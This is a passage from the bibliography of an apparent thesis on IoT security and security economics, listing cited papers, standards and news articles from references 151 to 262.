T. Rodden, Eds. ACM, 2010, pp. 1573–1582. [Online]. Available: http://doi.acm.org/10.1145/1753326.1753561 [151] Kerlink, “Kerlink continues global expansion with subsidiary in India for rollout of world’s largest LoRaWAN IoT network,” September 2017. [Online]. Available: https://www.kerlink.com/blog/2017/09/20/kerlink-continues- global-expansion-with-subsidiary-in-india/ [152] J. Y. Kim, R. Holz, W. Hu, and S. Jha, “Automated analysis of secure Internet of Things protocols,” in Proceedings of the 33rd Annual Computer Security Applications Conference, Orlando, FL, USA, December 4-8, 2017. ACM, 2017, pp. 238–249. [Online]. Available: http://doi.acm.org/10.1145/3134600.3134624 [153] J. Y. Kim, W. Hu, D. Sarkar, and S. Jha, “ESIoT: Enabling secure management of the Internet of Things,” in Proceedings of the 10th ACM Conference on Security and Privacy in Wireless and Mobile Networks, WiSec 2017, Boston, MA, USA, July 18-20, 2017, G. Noubir, M. Conti, and S. K. Kasera, Eds. ACM, 2017, pp. 219–229. [Online]. Available: http://doi.acm.org/10.1145/3098243.3098252 [154] S. T. King, J. Tucek, A. Cozzie, C. Grier, W. Jiang, and Y. Zhou, “Designing and implementing malicious hardware,” in First USENIX Workshop on Large-Scale Exploits and Emergent Threats, LEET ’08, San Francisco, CA, USA,

168 Bibliography

April 15, 2008, Proceedings, F. Monrose, Ed. USENIX Association, 2008. [Online]. Available: http://www.usenix.org/events/leet08/tech/full papers/king/king.pdf

[155] S. Kleber, H. F. N¨olscher, and F. Kargl, “Automated PCB reverse engineering,” in 11th USENIX Workshop on Offensive Technologies, WOOT 2017, Vancouver, BC, Canada, August 14-15, 2017., W. Enck and C. Mulliner, Eds. USENIX Association, 2017. [Online]. Available: https://www.usenix.org/conference/woot17/workshop- program/presentation/kleber

[156] ——, “Automated PCB reverse engineering,” in 11th USENIX Work- shop on Offensive Technologies, WOOT 2017, Vancouver, BC, Canada, August 14-15, 2017., W. Enck and C. Mulliner, Eds. USENIX Association, 2017. [Online]. Available: https://www.usenix.org/conference/woot17/workshop- program/presentation/kleber

[157] C. Kolias, G. Kambourakis, A. Stavrou, and J. M. Voas, “DDoS in the IoT: Mirai and other botnets,” IEEE Computer, vol. 50, no. 7, pp. 80–84, 2017. [Online]. Available: https://doi.org/10.1109/MC.2017.201

[158] M. Kooijman, “Arduino LoraMAC-in-C (LMiC) library.” [Online]. Available: https://github.com/matthijskooijman/arduino-lmic

[159] K. Korosec, “Ford’s executives really, really hated its MyFord touch infotainment system,” Fortune, October 2016. [Online]. Available: http://fortune.com/2016/10/ 07/myford-touch-lawsuit/

[160] N. Koschate-Fischer, I. V. Huber, and W. D. Hoyer, “When will price increases associated with company donations to charity be perceived as fair?” Journal of the Academy of Marketing Science, vol. 44, no. 5, pp. 608–626, Sep 2016. [Online]. Available: https://doi.org/10.1007/s11747-015-0454-5

[161] B. Krebs, “Hacked cameras, DVRs powered today’s massive Internet outage,” October 2016. [Online]. Available: https://krebsonsecurity.com/2016/10/hacked- cameras-dvrs-powered-todays-massive-internet-outage/

[162] M. Krotofil, A. A. C´ardenas, B. Manning, and J. Larsen, “CPS: Driving cyber-physical systems to unsafe operating conditions by timing DoS attacks on sensor signals,” in Proceedings of the 30th Annual Computer Security Applications Conference, ACSAC 2014, New Orleans, LA, USA, December 8-12, 2014, C. N. P. Jr., A. Hahn, K. R. B. Butler, and M. Sherr, Eds. ACM, 2014, pp. 146–155. [Online]. Available: http://doi.acm.org/10.1145/2664243.2664290

[163] R. Kumar, P. Jovanovic, W. P. Burleson, and I. Polian, “Parametric trojans for fault-injection attacks on cryptographic hardware,” in 2014 Workshop on Fault Diagnosis and Tolerance in Cryptography, FDTC 2014, Busan, South Korea, September 23, 2014, A. Tria and D. Choi, Eds. IEEE Computer Society, 2014, pp. 18–28. [Online]. Available: https://doi.org/10.1109/FDTC.2014.12

169 Bibliography

[164] K. Kursawe, G. Danezis, and M. Kohlweiss, “Privacy-friendly aggregation for the smart-grid,” in Privacy Enhancing Technologies - 11th International Symposium, PETS 2011, Waterloo, ON, Canada, July 27-29, 2011. Proceedings, ser. Lecture Notes in Computer Science, S. Fischer-H¨ubnerand N. Hopper, Eds., vol. 6794. Springer, 2011, pp. 175–191. [Online]. Available: http://dx.doi.org/10.1007/978-3- 642-22263-4 10 [165] T. Kushwaha and V. Shankar, “Are multichannel customers really more valuable? The moderating role of product category characteristics,” Journal of Marketing, vol. 77, no. 4, pp. 67–85, 2013. [Online]. Available: https://doi.org/10.1509/jm.11. 0297 [166] K. S. Kwak, S. Ullah, and N. Ullah, “An overview of IEEE 802.15.6 standard,” in 2010 3rd International Symposium on Applied Sciences in Biomedical and Communication Technologies (ISABEL 2010), November 2010, pp. 1–6. [Online]. Available: https://doi.org/10.1109/ISABEL.2010.5702867 [167] Y. Lai and P. Hsia, “Using the vulnerability information of computer systems to improve the network security,” Computer Communications, vol. 30, no. 9, pp. 2032–2047, 2007. [Online]. Available: https://doi.org/10.1016/j.comcom.2007.03.007 [168] K. P. Lam, M. H¨oynck, B. Dong, B. Andrews, Y. Chiou, D. Benitez, and J. Choi, “Occupancy detection through an extensive environmental sensor network in an open-plan office building,” in Proc. of Building Simulation 09, an IBPSA Conference, 2009. [169] R. Lange and E. W. Burger, “Long-term market implications of data breaches, not,” Journal of Information Privacy and Security, vol. 13, no. 4, pp. 186–206, 2017. [Online]. Available: https://doi.org/10.1080/15536548.2017.1394070 [170] H. Lasi, P. Fettke, H.-G. Kemper, T. Feld, and M. Hoffmann, “Industry 4.0,” Business & Information Systems Engineering, vol. 6, no. 4, pp. 239–242, August 2014. [Online]. Available: https://doi.org/10.1007/s12599-014-0334-4 [171] J. L´azaro, A. Astarloa, A. Zuloaga, U. Bidarte, and J. Jimenez, “I2CSec: A secure serial chip-to-chip communication protocol,” Journal of Systems Architecture - Embedded Systems Design, vol. 57, no. 2, pp. 206–213, 2011. [Online]. Available: https://doi.org/10.1016/j.sysarc.2010.12.001 [172] F. W. A. A. V. Leeuwen, “Network discovery with touchlink option,” February 2014, WO Patent App. PCT/IB2013/056,663. [Online]. Available: https://www.google.com/patents/WO2014030103A2 [173] J. Lei, N. Dawar, and Z. G¨urhan-Canli, “Base-rate information in consumer attributions of product-harm crises,” Journal of Marketing Research, vol. 49, no. 3, pp. 336–348, 2012. [Online]. Available: https://doi.org/10.1509/jmr.10.0197 [174] L. Lemaire, J. Vossaert, B. D. Decker, and V. Naessens, “Extending FAST-CPS for the analysis of data flows in cyber-physical systems,” in Computer Network Security

170 Bibliography

- 7th International Conference on Mathematical Methods, Models, and Architectures for Computer Network Security, MMM-ACNS 2017, Warsaw, Poland, August 28-30, 2017, Proceedings, ser. Lecture Notes in Computer Science, J. Rak, J. Bay, I. V. Kotenko, L. J. Popyack, V. A. Skormin, and K. Szczypiorski, Eds., vol. 10446. Springer, 2017, pp. 37–49. [Online]. Available: https://doi.org/10.1007/978-3-319- 65127-9 4 [175] A. Lengerer, J. Schroedter, M. Boehle, T. Hubert, and C. Wolf, “Datenhandbuch GESIS-Mikrozensus-Trendfile: Harmonisierung der Mikrozensen 1962 bis 2006 (in German),” 2010. [176] T. Lev¨aand H. Suomi, “Techno-economic feasibility analysis of Internet protocols: Framework and tools,” Computer Standards & Interfaces, vol. 36, no. 1, pp. 76–88, 2013. [Online]. Available: https://doi.org/10.1016/j.csi.2013.07.011 [177] E.´ Leverett, R. Clayton, and R. Anderson, “Standardisation and certification of the ‘Internet of Things’,” 16th Annual Workshop on the Economics of Information Security, WEIS 2017, University of California San Diego, CA, USA, June 26-27, 2017, 2017. [Online]. Available: http://www.cl.cam.ac.uk/∼rja14/Papers/weis2017. pdf [178] D. J. Leversage and E. J. James, “Estimating a system’s mean time-to-compromise,” IEEE Security & Privacy, vol. 6, no. 1, pp. 52–60, 2008. [Online]. Available: https://doi.org/10.1109/MSP.2008.9 [179] Library of Congress, “H.R.6 - Energy Independence and Security Act of 2007,” 2007. [Online]. Available: https://www.congress.gov/bill/110th-congress/house-bill/6 [180] LimeSurvey, “LimeSurvey: The online survey tool - Open source surveys,” 2018. [Online]. Available: https://www.limesurvey.org/ [181] L. Lin, M. Kasper, T. G¨uneysu, C. Paar, and W. Burleson, “Trojan side- channels: Lightweight hardware trojans through side-channel engineering,” in Cryptographic Hardware and Embedded Systems - CHES 2009, 11th International Workshop, Lausanne, Switzerland, September 6-9, 2009, Proceedings, ser. Lecture Notes in Computer Science, C. Clavier and K. Gaj, Eds., vol. 5747. Springer, 2009, pp. 382–395. [Online]. Available: https://doi.org/10.1007/978-3-642-04138-9 27 [182] T. Liu, Y. Gu, D. Wang, Y. Gui, and X. Guan, “A novel method to detect bad data injection attack in smart grid,” in Proceedings of the IEEE INFOCOM 2013, Turin, Italy, April 14-19, 2013. IEEE, 2013, pp. 3423–3428. [Online]. Available: https://doi.org/10.1109/INFCOM.2013.6567175

[183] LoRa Alliance, LoRaWAN Specification – Version 1.0.2, July 2016. [Online]. Available: https://lora-alliance.org/resource-hub/lorawantm-specification-v102 [184] ——, “LoRa Alliance surpasses 500 member mark and drives strong LoRaWAN protocol deployments,” June 2017. [Online]. Avail-

171 Bibliography

able: https://lora-alliance.org/in-the-news/lora-alliancetm-surpasses-500-member- mark-and-drives-strong-lorawantm-protocol [185] ——, “LoRaWAN global networks – Where are we today?” October 2017. [Online]. Available: https://docbox.etsi.org/Workshop/2017/201710 IoTWEEK/ WORKSHOP/S04 CONNECTING IoT/LoRaAlliance THUBERT.pdf [186] J. J. Louviere, T. N. Flynn, and R. T. Carson, “Discrete choice experiments are not conjoint analysis,” Journal of Choice Modelling, vol. 3, no. 3, pp. 57–72, 2010. [Online]. Available: http://www.sciencedirect.com/science/article/pii/ S1755534513700149 [187] J. Lu, T. I. Sookoor, V. Srinivasan, G. Gao, B. Holben, J. A. Stankovic, E. Field, and K. Whitehouse, “The smart thermostat: using occupancy sensors to save energy in homes,” in Proceedings of the 8th International Conference on Embedded Networked Sensor Systems, SenSys 2010, Zurich, Switzerland, November 3-5, 2010, J. Beutel, D. Ganesan, and J. A. Stankovic, Eds. ACM, 2010, pp. 211–224. [Online]. Available: https://doi.org/10.1145/1869983.1870005 [188] X. Luo, H. Li, J. Zhang, and J. Shim, “Examining multi-dimensional trust and multi-faceted risk in initial acceptance of emerging technologies: An empirical study of mobile banking services,” Decision Support Systems, vol. 49, no. 2, pp. 222–234, 2010. [Online]. Available: http://www.sciencedirect.com/science/article/ pii/S016792361000045X [189] M. Lyu, D. Sherratt, A. Sivanathan, H. H. Gharakheili, A. Radford, and V. Sivaraman, “Quantifying the reflective DDoS attack capability of household IoT devices,” in Proceedings of the 10th ACM Conference on Security and Privacy in Wireless and Mobile Networks, WiSec 2017, Boston, MA, USA, July 18-20, 2017, G. Noubir, M. Conti, and S. K. Kasera, Eds. ACM, 2017, pp. 46–51. [Online]. Available: http://doi.acm.org/10.1145/3098243.3098264 [190] Machina Research, “With 3 billion connections, LPWA will dominate wide area wireless connectivity for M2M by 2023,” February 2015. [On- line]. Available: https://machinaresearch.com/news/with-3-billion-connections- lpwa-will-dominate-wide-area-wireless-connectivity-for-m2m-by-2023/ [191] S. B. MacKenzie, R. J. Lutz, and G. E. Belch, “The role of attitude toward the ad as a mediator of advertising effectiveness: A test of competing explanations,” Journal of Marketing Research, vol. 23, no. 2, pp. 130–143, 1986. [Online]. Available: http://www.jstor.org/stable/3151660 [192] J. Margulies, “Garage door openers: An Internet of Things case study,” IEEE Security & Privacy, vol. 13, no. 4, pp. 80–83, 2015. [Online]. Available: https://doi.org/10.1109/MSP.2015.80 [193] I. M. Martin, D. W. Stewart, and S. Matta, “Branding strategies, marketing communication, and perceived brand meaning: The transfer of purposive,

172 Bibliography

goal–oriented brand meaning to brand extensions,” Journal of the Academy of Marketing Science, vol. 33, no. 3, pp. 275–294, 2005. [Online]. Available: https://doi.org/10.1177/0092070304271197 [194] D. Mashima and A. A. C´ardenas, “Evaluating electricity theft detectors in smart grid networks,” in Research in Attacks, Intrusions, and Defenses - 15th International Symposium, RAID 2012, Amsterdam, The Netherlands, September 12- 14, 2012. Proceedings, ser. Lecture Notes in Computer Science, D. Balzarotti, S. J. Stolfo, and M. Cova, Eds., vol. 7462. Springer, 2012, pp. 210–229. [Online]. Available: https://doi.org/10.1007/978-3-642-33338-5 11 [195] M. K. Masood, Y. C. Soh, and V. W. Chang, “Real-time occupancy estimation using environmental parameters,” in 2015 International Joint Conference on Neural Networks, IJCNN 2015, Killarney, Ireland, July 12-17, 2015. IEEE, 2015, pp. 1–8. [Online]. Available: http://dx.doi.org/10.1109/IJCNN.2015.7280781 [196] A. Mathur and M. Chetty, “Impact of user characteristics on attitudes towards automatic mobile application updates,” in Thirteenth Symposium on Usable Privacy and Security, SOUPS 2017, Santa Clara, CA, USA, July 12-14, 2017. USENIX Association, 2017, pp. 175–193. [Online]. Available: https://www.usenix.org/ conference/soups2017/technical-sessions/presentation/mathur

[197] C. Mathwick and E. Rigdon, “Play, flow, and the online search experience,” Journal of Consumer Research, vol. 31, no. 2, pp. 324–332, 2004. [Online]. Available: http://dx.doi.org/10.1086/422111 [198] S. Mattejat, “Traffic analysis and denial-of-service attacks in connected lighting sys- tems,” Bachelor’s thesis, Friedrich-Alexander-Universit¨atErlangen-N¨urnberg, Ger- many, June 2016. [199] McAfee, “New security priorities in an increasingly connected world,” January 2018. [Online]. Available: https://securingtomorrow.mcafee.com/consumer/key-findings- from-our-survey-on-identity-theft-family-safety-and-home-network-security/ [200] H. D. Mehr, H. Polat, and A. Cetin, “Resident activity recognition in smart homes by using artificial neural networks,” in 2016 4th International Istanbul Smart Grid Congress and Fair (ICSG), April 2016, pp. 1–5. [Online]. Available: https://doi.org/10.1109/SGCF.2016.7492428 [201] P. Mell, K. Scarfone, and S. Romanosky, “A complete guide to the common vulnerability scoring system,” 2007. [Online]. Available: http://www.first.org/cvss/ cvss-guide.pdf [202] Merriam Webster Dictonary, “Definition of Internet of Things,” 2018. [Online]. Available: https://www.merriam-webster.com/dictionary/Internet%20of%20Things [203] K. M. Miller, R. Hofstetter, H. Krohmer, and Z. J. Zhang, “How should consumers’ willingness to pay be measured? An empirical comparison of state-of-the-art

173 Bibliography

approaches,” Journal of Marketing Research, vol. 48, no. 1, pp. 172–184, 2011. [Online]. Available: https://doi.org/10.1509/jmkr.48.1.172

[204] H. Min and G. Zhou, “Supply chain modeling: Past, present and future,” Computers & Industrial Engineering, vol. 43, no. 1, pp. 231–249, 2002. [Online]. Available: http://www.sciencedirect.com/science/article/pii/S0360835202000669

[205] R. Minerva, A. Biru, and D. Rotondi, “Towards a definition of the Internet of Things (IoT) – Revision 1,” IEEE Internet Initiative, May 2015. [Online]. Available: https://iot.ieee.org/definition.html

[206] M. Mohsin, Z. Anwar, F. Zaman, and E. Al-Shaer, “IoTChecker: A data-driven framework for security analytics of Internet of Things configurations,” Computers & Security, vol. 70, pp. 199–223, 2017. [Online]. Available: https://doi.org/10. 1016/j.cose.2017.05.012

[207] A. Molina-Markham, P. Shenoy, K. Fu, E. Cecchet, and D. Irwin, “Private memoirs of a smart meter,” in Proceedings of the 2nd ACM Workshop on Embedded Sensing Systems for Energy-Efficiency in Building, ser. BuildSys ’10. New York, NY, USA: ACM, 2010, pp. 61–66. [Online]. Available: http://doi.acm.org/10.1145/1878431. 1878446

[208] P. Morgner and Z. Benenson, “Exploring security economics in IoT standardization efforts,” in Proceedings of the NDSS Workshop on Decentralized IoT Security and Standards, DISS’18, San Diego, CA, USA, February 18, 2018, 2018. [Online]. Available: http://wp.internetsociety.org/ndss/wp-content/uploads/sites/25/2018/ 07/diss2018 9 Morgner paper.pdf

[209] P. Morgner, Z. Benenson, C. M¨uller,and F. Armknecht, “Design space of smart home networks from a security perspective,” in Proceedings of the 14. GI/ITG KuVS Fachgespr¨achSensornetze (FGSN 2015), Erlangen, Germany, September 23- 24, 2015, 2015, pp. 41–44. [Online]. Available: https://core.ac.uk/download/pdf/ 86433152.pdf

[210] P. Morgner, F. Freiling, and Z. Benenson, “Opinion: Security lifetime labels - Overcoming information asymmetry in security of IoT consumer products,” in Proceedings of the 11th ACM Conference on Security & Privacy in Wireless and Mobile Networks, WiSec 2018, Stockholm, Sweden, June 18-20, 2018, P. Papadimitratos, K. Butler, and C. P¨opper, Eds. ACM, 2018, pp. 208–211. [Online]. Available: http://doi.acm.org/10.1145/3212480.3212486

[211] P. Morgner, C. Mai, N. Koschate-Fischer, F. Freiling, and Z. Benenson, “Security update labels: Establishing economic incentives for security patching of IoT con- sumer products,” To appear in the Proceedings of the IEEE Symposium on Security and Privacy (S&P), May 2020, IEEE Computer Society, 2020. [212] P. Morgner, S. Mattejat, and Z. Benenson, “All your bulbs are belong to us:

174 Bibliography

Investigating the current state of security in connected lighting systems,” CoRR, vol. abs/1608.03732, 2016. [Online]. Available: http://arxiv.org/abs/1608.03732 [213] P. Morgner, S. Mattejat, Z. Benenson, C. M¨uller, and F. Armknecht, “Insecure to the touch: Attacking ZigBee 3.0 via touchlink commissioning,” in Proceedings of the 10th ACM Conference on Security and Privacy in Wireless and Mobile Networks, WiSec 2017, Boston, MA, USA, July 18-20, 2017, G. Noubir, M. Conti, and S. K. Kasera, Eds. ACM, 2017, pp. 230–240. [Online]. Available: http://doi.acm.org/10.1145/3098243.3098254 [214] P. Morgner, C. M¨uller, M. Ring, B. Eskofier, C. Riess, F. Armknecht, and Z. Benenson, “Privacy implications of room climate data,” in Computer Security - ESORICS 2017 - 22nd European Symposium on Research in Computer Security, Oslo, Norway, September 11-15, 2017, Proceedings, Part II, ser. Lecture Notes in Computer Science, S. N. Foley, D. Gollmann, and E. Snekkenes, Eds., vol. 10493. Springer, 2017, pp. 324–343. [Online]. Available: https://doi.org/10.1007/978-3- 319-66399-9 18 [215] P. Morgner, S. Pfennig, D. Salzner, and Z. Benenson, “Malicious IoT implants: Tampering with serial communication over the Internet,” in Research in Attacks, Intrusions, and Defenses - 21st International Symposium, RAID 2018, Heraklion, Crete, Greece, September 10-12, 2018, Proceedings, ser. Lecture Notes in Computer Science, M. Bailey, T. Holz, M. Stamatogiannakis, and S. Ioannidis, Eds., vol. 11050. Springer, 2018, pp. 535–555. [Online]. Available: https://doi.org/10.1007/978-3-030-00470-5 25 [216] Moteiv Corporation, “Tmote Sky datasheet,” Moteiv Corporation, 2006. [Online]. Available: https://www.snm.ethz.ch/snmwiki/pub/uploads/Projects/ tmote sky datasheet.pdf [217] S. J. Murdoch, M. Bond, and R. Anderson, “How certification systems fail: Lessons from the Ware report,” IEEE Security & Privacy, vol. 10, no. 6, pp. 40–44, 2012. [Online]. Available: https://doi.org/10.1109/MSP.2012.89 [218] M. Natter and M. Feurstein, “Real world performance of choice-based conjoint models,” European Journal of Operational Research, vol. 137, no. 2, pp. 448–458, 2002, graphs and Scheduling. [Online]. Available: http://www.sciencedirect.com/ science/article/pii/S0377221701001473

[219] P. Nelson, “Information and consumer behavior,” Journal of Political Economy, vol. 78, no. 2, pp. 311–329, 1970. [Online]. Available: https://doi.org/10.1086/259630 [220] Nest, “Privacy statement for Nest products and services,” March 2016. [Online]. Available: https://nest.com/legal/privacy-statement-for-nest-products- and-services/ [221] S. Notra, M. Siddiqi, H. H. Gharakheili, V. Sivaraman, and R. Boreli, “An experimental study of security and privacy risks with emerging household

175 Bibliography

appliances,” in IEEE Conference on Communications and Network Security, CNS 2014, San Francisco, CA, USA, October 29-31, 2014. IEEE, 2014, pp. 79–84. [Online]. Available: https://doi.org/10.1109/CNS.2014.6997469 [222] NXP, “The I2C-bus specification and user manual – UM10204,” April 2014. [Online]. Available: https://www.nxp.com/docs/en/user-guide/UM10204.pdf [223] J. Oberg, W. Hu, A. Irturk, M. Tiwari, T. Sherwood, and R. Kastner, “Information flow isolation in I2C and USB,” in Proceedings of the 48th Design Automation Conference, DAC 2011, San Diego, California, USA, June 5-10, 2011, L. Stok, N. D. Dutt, and S. Hassoun, Eds. ACM, 2011, pp. 254–259. [Online]. Available: https://doi.org/10.1145/2024724.2024782 [224] O. Olawumi, K. Haataja, M. Asikainen, N. Vidgren, and P. Toivanen, “Three practical attacks against ZigBee security: Attack scenario definitions, practical experiments, countermeasures, and lessons learned,” in 14th International Conference on Hybrid Intelligent Systems, HIS 2014, Kuwait, December 14-16, 2014. IEEE, 2014, pp. 199–206. [Online]. Available: http://dx.doi.org/10.1109/HIS.2014. 7086198

[225] B. Orme, “Interpreting conjoint analysis data,” Getting Started with Conjoint Analysis: Strategies for Product Design and Pricing Research, 2010. [Online]. Available: https://www.sawtoothsoftware.com/download/techpap/interpca.pdf

[226] ——, “Sample size issues for conjoint analysis studies,” Getting Started with Conjoint Analysis: Strategies for Product Design and Pricing Research, 2010. [Online]. Available: https://www.sawtoothsoftware.com/download/techpap/samplesz.pdf

[227] ——, “Which conjoint method should I use,” Sawtooth Software Research Paper Series, 2014. [Online]. Available: https://www.sawtoothsoftware.com/download/ techpap/which conjoint v7.pdf [228] Oxford Dictonary, “Definition of Internet of Things in English,” 2018. [Online]. Available: https://en.oxforddictionaries.com/definition/internet of things [229] Y. M. P. Pa, S. Suzuki, K. Yoshioka, T. Matsumoto, T. Kasama, and C. Rossow, “IoTPOT: Analysing the rise of IoT compromises,” in 9th USENIX Workshop on Offensive Technologies, WOOT ’15, Washington, DC, USA, August 10-11, 2015., A. Francillon and T. Ptacek, Eds. USENIX Association, 2015. [Online]. Available: https://www.usenix.org/conference/woot15/workshop-program/presentation/pa [230] D. Palmer, “Security flaw in LG IoT software left home appliances vulnerable,” ZDNet, October 2017. [Online]. Available: http://www.zdnet.com/article/security- flaw-in-lg-iot-software-left-home-appliances-vulnerable/ [231] Y. Park, Y. Son, H. Shin, D. Kim, and Y. Kim, “This ain’t your dose: Sensor spoofing attack on medical infusion pump,” in 10th USENIX Workshop on Offensive Technologies, WOOT 16, Austin, TX, USA, August 8-9, 2016., N. Silvanovich and

176 Bibliography

P. Traynor, Eds. USENIX Association, 2016. [Online]. Available: https://www. usenix.org/conference/woot16/workshop-program/presentation/park

[232] M. V. Pauly, “The economics of moral hazard: Comment,” The American Economic Review, vol. 58, no. 3, pp. 531–537, 1968. [Online]. Available: http://www.jstor.org/stable/1813785 [233] T. H. Pedersen, K. U. Nielsen, and S. Petersen, “Method for room occupancy detection based on trajectory of indoor climate sensor data,” Building and Environment, vol. 115, pp. 147–156, 2017. [Online]. Available: http://www.sciencedirect.com/science/article/pii/S0360132317300367 [234] S. Pfennig, “Implementation and evaluation of hardware implants,” Master’s thesis, Friedrich-Alexander-Universit¨atErlangen-N¨urnberg, Germany, January 2018. [235] Philips, “Friends of hue - update,” December 2015. [Online]. Available: http://www.developers.meethue.com/documentation/friends-hue-update [236] J. Picod, A. Lebrun, and J. Demay, “Bringing software defined radio to the penetration testing community,” in Black Hat USA, 2014. [Online]. Available: https://www.blackhat.com/docs/us-14/materials/us-14-Picod-Bringing- Software-Defined-Radio-To-The-Penetration-Testing-Community-WP.pdf [237] J. Pinnell, “Comment on Huber: Practical suggestions for CBC stud- ies,” Sawtooth Software Research Paper Series, 2005. [Online]. Available: https://www.sawtoothsoftware.com/support/technical-papers/cbc-related-papers/ the-benefits-of-accounting-for-respondent-heterogeneity-in-choice-modeling-1999

[238] R Core Team, R: A Language and Environment for Statistical Computing,R Foundation for Statistical Computing, Vienna, Austria, 2014. [Online]. Available: http://www.R-project.org

[239] M. Rahnema, “Overview of the GSM system and protocol architecture,” IEEE Communications Magazine, vol. 31, no. 4, pp. 92–100, April 1993. [Online]. Available: https://doi.org/10.1109/35.210402 [240] L. Rainie and M. Duggan, “Pew Research: Privacy and Information Sharing,” January 2016. [Online]. Available: http://www.pewinternet.org/2016/01/14/ privacy-and-information-sharing [241] S. Ray, T. Hoque, A. Basak, and S. Bhunia, “The power play: Security-energy trade-offs in the IoT regime,” in 34th IEEE International Conference on Computer Design, ICCD 2016, 2016, pp. 690–693. [242] E. M. Redmiles, S. Kross, and M. L. Mazurek, “How well do my results generalize? comparing security and privacy survey results from MTurk, web, and telephone samples,” in 2019 IEEE Symposium on Security and Privacy (SP), 2019, pp. 227–244. [Online]. Available: doi.ieeecomputersociety.org/10.1109/SP.2019.00014

177 Bibliography

[243] E. M. Redmiles, M. L. Mazurek, and J. P. Dickerson, “Dancing pigs or externalities? Measuring the rationality of security decisions,” in Proceedings of the 2018 ACM Conference on Economics and Computation, Ithaca, NY, USA, E.´ Tardos, E. Elkind, and R. Vohra, Eds. ACM, 2018, pp. 215–232. [Online]. Available: https://doi.org/10.1145/3219166.3219185 [244] C. Reichert, “NNN Co and Actility announce LoRaWAN network rollout across Australia,” ZDNet, February 2017. [Online]. Available: https://www.zdnet.com/ article/nnn-co-and-actility-announce-lorawan-network-rollout-across-australia/ [245] A. Reinhardt, F. Englert, and D. Christin, “Averting the privacy risks of smart metering by local data preprocessing,” Pervasive and Mobile Computing, vol. 16, pp. 171–183, 2015. [Online]. Available: https://doi.org/10.1016/j.pmcj.2014.10.002

[246] A. Rial and G. Danezis, “Privacy-preserving smart metering,” in Proceedings of the 10th Annual ACM Workshop on Privacy in the Electronic Society, ser. WPES ’11. New York, NY, USA: ACM, 2011, pp. 49–60. [Online]. Available: http://doi.acm.org/10.1145/2046556.2046564 [247] M. Ring, U. Jensen, P. Kugler, and B. Eskofier, “Software-based performance and complexity analysis for the design of embedded classification systems,” in Proceedings of the 21st International Conference on Pattern Recognition, ICPR 2012, Tsukuba, Japan, November 11-15, 2012. IEEE Computer Society, 2012, pp. 2266–2269. [Online]. Available: http://ieeexplore.ieee.org/xpl/freeabs all.jsp? arnumber=6460616 [248] E. Ronen, C. O’Flynn, A. Shamir, and A. Weingarten, “IoT goes nuclear: Creating a ZigBee chain reaction,” in 2017 IEEE Symposium on Security and Privacy, SP 2017, San Jose, CA, USA. IEEE Computer Society, 2017, pp. 195–212. [Online]. Available: https://doi.org/10.1109/SP.2017.14 [249] E. Ronen and A. Shamir, “Extended functionality attacks on IoT devices: The case of smart lights,” in IEEE European Symposium on Security and Privacy, EuroS&P 2016, Saarbr¨ucken,Germany, March 21-24, 2016. IEEE, 2016, pp. 3–12. [Online]. Available: http://dx.doi.org/10.1109/EuroSP.2016.13 [250] M. Rostami, F. Koushanfar, J. Rajendran, and R. Karri, “Hardware security: Threat models and metrics,” in The IEEE/ACM International Conference on Computer-Aided Design, ICCAD’13, San Jose, CA, USA, November 18-21, 2013, J. Henkel, Ed. IEEE, 2013, pp. 819–823. [Online]. Available: https://doi.org/10.1109/ICCAD.2013.6691207 [251] M. Ryan and J. Hughes, “Using conjoint analysis to assess women’s preferences for miscarriage management,” Health Economics, vol. 6, no. 3, pp. 261–273, 1997. [Online]. Available: https://onlinelibrary.wiley.com/doi/abs/10.1002/(SICI)1099- 1050(199705)6:3h261::AID-HEC262i3.0.CO;2-N [252] M. Ryan, “Bluetooth: With low energy comes low security,” in 7th USENIX

178 Bibliography

Workshop on Offensive Technologies, WOOT ’13, Washington, D.C., USA, August 13, 2013, J. Oberheide and W. K. Robertson, Eds. USENIX Association, 2013. [Online]. Available: https://www.usenix.org/conference/woot13/workshop- program/presentation/ryan

[253] R. Safavi-Naini, Digital Rights Management: Technologies, Issues, Challenges and Systems. Springer Science & Business Media, 2006, vol. 3919. [254] D. Salzner, “Security analysis of I2C communications in smart home products,” Master’s thesis, Friedrich-Alexander-Universit¨atErlangen-N¨urnberg, Germany, June 2016. [255] K. Sammer and R. W¨ustenhagen, “The influence of eco-labelling on consumer behaviour – Results of a discrete choice analysis for washing machines,” Business Strategy and the Environment, vol. 15, no. 3, pp. 185–199, 2006. [Online]. Available: http://dx.doi.org/10.1002/bse.522 [256] R. C. Sampson, “R&D alliances and firm performance: The impact of technological diversity and alliance organization on innovation,” The Academy of Management Journal, vol. 50, no. 2, pp. 364–386, 2007. [Online]. Available: http://www.jstor.org/stable/20159859 [257] L. S´anchez, L. Mu˜noz,J. A. Galache, P. Sotres, J. R. Santana, V. Guti´errez, R. Ramdhany, A. Gluhak, S. Krco, E. Theodoridis, and D. Pfisterer, “SmartSantander: IoT experimentation over a smart city testbed,” Computer Networks, vol. 61, pp. 217–238, 2014. [Online]. Available: https://doi.org/10.1016/ j.bjp.2013.12.020 [258] N. Sastry and D. Wagner, “Security considerations for IEEE 802.15.4 networks,” in Proceedings of the 2004 ACM Workshop on Wireless Security, Philadelphia, PA, USA, October 1, 2004, M. Jakobsson and A. Perrig, Eds. ACM, 2004, pp. 32–42. [Online]. Available: http://doi.acm.org/10.1145/1023646.1023654 [259] Y. Sawaya, M. Sharif, N. Christin, A. Kubota, A. Nakarai, and A. Yamada, “Self-confidence trumps knowledge: A cross-cultural study of security behavior,” in Proceedings of the 2017 CHI Conference on Human Factors in Computing Systems, Denver, CO, USA, May 06-11, 2017., 2017, pp. 2202–2214. [Online]. Available: https://doi.org/10.1145/3025453.3025926 [260] Sawtooth Software, Inc., “The CBC latent class technical paper – Version 3,” Sawtooth Software Technical Paper Series, 2004. [Online]. Available: https://www. sawtoothsoftware.com/download/techpap/lctech.pdf [261] ——, “The Apple vs. Samsung ‘patent trial of the century,’ conjoint analysis, and Sawtooth Software,” 2012. [Online]. Available: http://www.sawtoothsoftware.com/ download/apple v samsung conjoint analysis.pdf [262] ——, “The CBC system for choice-based conjoint analysis – Version 9,”

179 Bibliography

